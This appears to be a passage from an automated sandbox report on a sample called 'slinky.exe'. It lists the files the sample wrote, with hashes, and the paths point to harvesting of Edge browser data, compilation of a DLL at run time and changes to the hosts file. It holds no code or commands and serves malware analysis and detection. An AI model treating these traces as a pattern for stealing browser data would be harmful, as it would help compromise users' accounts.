                                                                6ad97bb30fdda927a19d50af8fcb18bcea81e6df4ee971a95ce9ae820077954cc0c49406ccb3aca9eeb4d91791011e4a564f32361399435862ba3f7155dd8570

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\88ffdf12-9796-43c9-8902-a583f627e99a\index

                                                                Filesize

                                                                24B

                                                                MD5

                                                                54cb446f628b2ea4a5bce5769910512e

                                                                SHA1

                                                                c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

                                                                SHA256

                                                                fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

                                                                SHA512

                                                                8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\88ffdf12-9796-43c9-8902-a583f627e99a\index-dir\the-real-index

                                                                Filesize

                                                                2KB

                                                                MD5

                                                                721f555e48fc10f868e85a9acbdc9a61

                                                                SHA1

                                                                10391c020db468dbfec4d401f64a1d6b118df55c

                                                                SHA256

                                                                2f5abfac316ee0e14622aa9c3d3b7b065402c14be30c30413809afae58055ddd

                                                                SHA512

                                                                bfcde54004f15be80ac8aa667f0f38150bcfec673a0efd0f46702426a0ae69036b5a9645153319c9c35267a5e1fee794069bb07e5339b87d1aec3257f92d7ed7

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\88ffdf12-9796-43c9-8902-a583f627e99a\index-dir\the-real-index~RFe5800f5.TMP

                                                                Filesize

                                                                48B

                                                                MD5

                                                                b05734e70f0edbfc17668a2a811d09ce

                                                                SHA1

                                                                85f04115711daa0ed2f3b277f8254e8985bedf63

                                                                SHA256

                                                                3d2d780f7198d5edee3a462709ea88f9ed0869e5b49ef3324313c5c2341dc1b3

                                                                SHA512

                                                                ddbf19f4112abd97c01eaf39957534b81bca0bf8116339dce86b11285496b522c93845853b096acbdc9abb61652ad01b346a32144f72786d3eb9642c9734d285

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\cfb5c399-9f60-49b3-9f4a-bc4064fd26d7\index-dir\the-real-index

                                                                Filesize

                                                                2KB

                                                                MD5

                                                                fbc115ad70e208d86ae4a472de6b9508

                                                                SHA1

                                                                1f4e6528850fdcf5e2628ac97f8b0ac68c5dc440

                                                                SHA256

                                                                6b52bfd315284e75c4d474b453b127936020e046609064976c8725b69ac85ac7

                                                                SHA512

                                                                98c2b7aee76e08fb9e890534cbea319a85526ac7c6fac2c9d469474ce89fcb13aee5e6862bcd05ccea1beaeb9909283bf68e223ea2b5b95c654780c565e389be

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\cfb5c399-9f60-49b3-9f4a-bc4064fd26d7\index-dir\the-real-index~RFe57803c.TMP

                                                                Filesize

                                                                48B

                                                                MD5

                                                                2153a9ad8490b40b8f95b8419480594a

                                                                SHA1

                                                                cc7d34b148924cf768b1169e8c14dac9a2ed3b9d

                                                                SHA256

                                                                0e9f4536d7286396d91fe08f3b9a0b1f92f2f9b955261410dbde0aec72660d1d

                                                                SHA512

                                                                de7f5744a041097da403ef9ec147ebe96a0751d4edea231c506fd22cdeefff580bcd0bc58f636d6d208fd8af8562446466cc3c3da3ee2cfc291264a172fcfd95

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                Filesize

                                                                89B

                                                                MD5

                                                                002642bcb7cc56ca1b56f4b37c33cbe1

                                                                SHA1

                                                                649f08e9d77758ec61139aa9a17ed96880e4b223

                                                                SHA256

                                                                3848b5cb37c93b48bd5400a11f0a3f209bf7321cbf6f1cf6cd7e85eef149addc

                                                                SHA512

                                                                e74df9672db5adb3d1de939998b07453933481d49ab572108928d0f403a538b99ef4e74c2a5754b6f3d80ecf318319301f0839a8b08a814450dc51a266f4ec37

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                Filesize

                                                                146B

                                                                MD5

                                                                1232454f4e765a0a4c862cf2d175540a

                                                                SHA1

                                                                ac3f1b0a8d5d21ada3f53e1a7e761ec9b2cf44d9

                                                                SHA256

                                                                c825e7ae3c9acfd3d3adc6482f4257bfef14e1f012ab416ae7341e667d798e28

                                                                SHA512

                                                                652a8a20aaba9501691daa33ce2b2621383e69353fc581940e46f5adfc453b71991f9cd6359fae48833d297937322782f34a93c6cc987f88dd904ac432596428

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                Filesize

                                                                89B

                                                                MD5

                                                                41c5467f259c4e3b46f7b10f5e57cd84

                                                                SHA1

                                                                9a122d7192943ee3303aaed36c458ec24d6f6e8e

                                                                SHA256

                                                                f3aa057c13eb344dcc5ce7338bfb863d6ef6d1e28e16762fce8852aca0d708b5

                                                                SHA512

                                                                5ae70cabcaeee209f7cb11d72f3ea69bbde556eaf20e36b6809fe235102ff3e4447f6a12063a5b96dd6f5e9c59a72ce2f4e4cef25be552d458e6ab7fe29d1112

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                Filesize

                                                                82B

                                                                MD5

                                                                c728a00fadd1ee9cbe3860c708cb19ca

                                                                SHA1

                                                                8fefde5930c1dbc38f6df99e79138aecfbcc0dff

                                                                SHA256

                                                                28007c833b80a4ef31400806bae7444172e31e900b16574edf0339ea71ead5fa

                                                                SHA512

                                                                ea231976eb5a84bd490d68011e0bec6a42e288a2f593783d1aef7b8f581af48ec4b0b604f7016748cc4a3bc30726e327bbe8f20687b87fc91b6373c35ee4ce10

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                Filesize

                                                                146B

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                Filesize

                                                                156B

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                Filesize

                                                                26B

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                Filesize

                                                                153B

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                Filesize

                                                                82B

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

                                                                Filesize

                                                                16B

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                Filesize

                                                                120B

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                Filesize

                                                                96B

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57d273.TMP

                                                                Filesize

                                                                48B

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                Filesize

                                                                1KB

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                Filesize

                                                                706B

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57c052.TMP

                                                                Filesize

                                                                706B

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                Filesize

                                                                116KB

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                Filesize

                                                                16B

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                Filesize

                                                                11KB

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\a98ca0c6-5f31-446a-be42-d5d95c2c7676.tmp

                                                                Filesize

                                                                10KB

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                944B

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                944B

                                                              • C:\Users\Admin\AppData\Local\Temp\RESCE28.tmp

                                                                Filesize

                                                                1KB

                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gd0tg1wl.4ou.ps1

                                                                Filesize

                                                                60B

                                                              • C:\Users\Admin\AppData\Local\Temp\browsers-temp\Admin\Edge\Default\history.txt

                                                                Filesize

                                                                1KB

                                                              • C:\Users\Admin\AppData\Local\Temp\u2ylqpnw\u2ylqpnw.dll

                                                                Filesize

                                                                4KB

                                                              • C:\Users\Admin\AppData\Local\Temp\w85c5s8Us3\Display (1).png

                                                                Filesize

                                                                249KB

                                                              • C:\Users\Admin\Desktop\slinky\slinky.exe

                                                                Filesize

                                                                14.2MB

                                                              • C:\Users\Admin\Downloads\slinky.rar

                                                                Filesize

                                                                26.1MB

                                                              • C:\Windows\System32\drivers\etc\hosts

                                                                Filesize

                                                                2KB

                                                              • \??\c:\Users\Admin\AppData\Local\Temp\u2ylqpnw\CSC291A098498AB4C38BE9CF2141E525A96.TMP

                                                                Filesize

                                                                652B

                                                              • \??\c:\Users\Admin\AppData\Local\Temp\u2ylqpnw\u2ylqpnw.0.cs

                                                                Filesize

                                                                1004B

                                                              • \??\c:\Users\Admin\AppData\Local\Temp\u2ylqpnw\u2ylqpnw.cmdline

                                                                Filesize

                                                                607B

                                                              • memory/3076-1122-0x000002220C460000-0x000002220C482000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/4000-1191-0x000002CA84040000-0x000002CA84048000-memory.dmp

                                                                Filesize

                                                                32KB

                                                              • memory/4000-1195-0x000002CA9CBA0000-0x000002CA9CD49000-memory.dmp

                                                                Filesize

                                                                1.7MB